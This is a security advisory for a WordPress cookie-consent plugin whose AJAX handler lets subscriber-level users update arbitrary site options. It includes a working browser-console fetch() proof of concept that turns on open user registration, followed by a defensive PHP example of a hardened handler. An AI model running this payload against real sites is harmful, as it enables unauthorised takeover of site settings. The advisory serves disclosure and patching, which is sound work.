wpexploit / Wpvulndb / WPEX-ID:0C207E0A-F52D-4A59-A7B1-94E4A19B45F6
History: Jan 31, 2024 - 12:00 a.m.

Cookie Information < 2.0.23 - Subscriber+ Arbitrary Options Update


AI Score: 8.7 High (Confidence: High)
EPSS: 0.001 Low (Percentile: 19.5%)

Description

The plugin is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler, allowing any authenticated user, such as a subscriber, to update arbitrary site options.

Run the command below in the web browser's developer console, while on the blog as a subscriber user, to set the users_can_register option to true.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wpgdprc_update_integration&data={"name":"users_can_register","value":true,"type":"yolo"}&security=' + wpgdprcAdmin['ajaxNonce'],
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
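
For defenders, the sketch below shows one way to close this class of bug in a WordPress AJAX handler. It is an added example, not the plugin's own code or its actual fix: the action name and the `data` and `security` fields come from the request above, while the function name, the nonce action string and the allowlisted option names are assumptions.

```php
<?php
// Added example: hypothetical hardened handler, NOT the plugin's own code.
// From the advisory: action 'wpgdprc_update_integration', POST fields 'data' and 'security'.
// Assumed: function name, nonce action string, and the allowlisted option names.
const EXAMPLE_ALLOWED_OPTIONS = array(
    'example_integration_enabled' => 'bool',   // hypothetical plugin-owned option
    'example_integration_label'   => 'string', // hypothetical plugin-owned option
);

add_action( 'wp_ajax_wpgdprc_update_integration', 'example_update_integration' );

function example_update_integration() {
    // 1. CSRF check only: a valid nonce says nothing about privilege. The PoC
    //    above reads its nonce from a page served to a subscriber.
    check_ajax_referer( 'example_nonce_action', 'security' );

    // 2. Capability check: the control the advisory reports as missing.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Parse the JSON body defensively.
    $raw  = isset( $_POST['data'] ) ? wp_unslash( $_POST['data'] ) : '';
    $data = is_string( $raw ) ? json_decode( $raw, true ) : null;
    if ( ! is_array( $data ) || ! isset( $data['name'], $data['value'] )
        || ! is_string( $data['name'] ) || ! is_scalar( $data['value'] ) ) {
        wp_send_json_error( array( 'message' => 'Malformed request' ), 400 );
    }

    // 4. Allowlist: a client-supplied name never reaches update_option() unless
    //    the server already knows it, so core options such as
    //    users_can_register are rejected here.
    $name = $data['name'];
    if ( ! array_key_exists( $name, EXAMPLE_ALLOWED_OPTIONS ) ) {
        wp_send_json_error( array( 'message' => 'Unknown option' ), 400 );
    }

    // 5. Coerce by the server-side type; the client's "type" field is ignored.
    $value = ( 'bool' === EXAMPLE_ALLOWED_OPTIONS[ $name ] )
        ? (bool) $data['value']
        : sanitize_text_field( (string) $data['value'] );

    update_option( $name, $value );
    wp_send_json_success( array( 'name' => $name ) );
}
```

The `wp_ajax_` hook fires for every logged-in user regardless of role, so the handler has to enforce the capability itself.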
